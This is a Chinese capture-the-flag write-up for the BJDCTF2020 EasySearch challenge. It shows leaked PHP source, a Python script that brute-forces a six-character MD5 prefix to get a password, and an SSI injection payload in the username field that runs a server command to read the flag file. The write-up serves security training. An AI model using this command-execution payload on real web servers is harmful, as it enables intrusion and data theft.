目錄

• 源碼
• 思路
• 題解
• 總結

---

源碼

掃目錄發現index.php.swp

<?phpob_start();//加密function get_hash(){$chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-';$random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)];//Random 5 times$content = uniqid().$random;return sha1($content); }header("Content-Type: text/html;charset=utf-8");***if(isset($_POST['username']) and $_POST['username'] != '' ){$admin = '6d0bc1';if ( $admin == substr(md5($_POST['password']),0,6)) {echo "<script>alert('[+] Welcome to manage system')</script>";$file_shtml = "public/".get_hash().".shtml";$shtml = fopen($file_shtml, "w") or die("Unable to open file!");$text = '******<h1>Hello,'.$_POST['username'].'</h1>******';fwrite($shtml,$text);fclose($shtml);***echo "[!] Header error ...";} else {echo "<script>alert('[!] Failed')</script>";}else{***}*** ?>

---

思路

可以看出只要密碼為6d0bc1的前六位就可以成功登錄,username為任意值

if(isset($_POST['username']) and $_POST['username'] != '' ){$admin = '6d0bc1';if ( $admin == substr(md5($_POST['password']),0,6)) {echo "<script>alert('[+] Welcome to manage system')</script>";

爆破腳本

import hashlibfor i in range(1000000000):a = hashlib.md5(str(i).encode('utf-8')).hexdigest()if a[0:6]=='6d0bc1':print(i)break

得出密碼為2020666,抓包后登錄,看到了shtml,猜測考點是SSI注入,url_is_here頁面為回顯內容

訪問生成的地址拿到flag

題解

username=<!--#exec cmd="tac ../f*" -->&password=2020666

---

總結

…

總結

以上是生活随笔為你收集整理的[BJDCTF2020]EasySearch的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。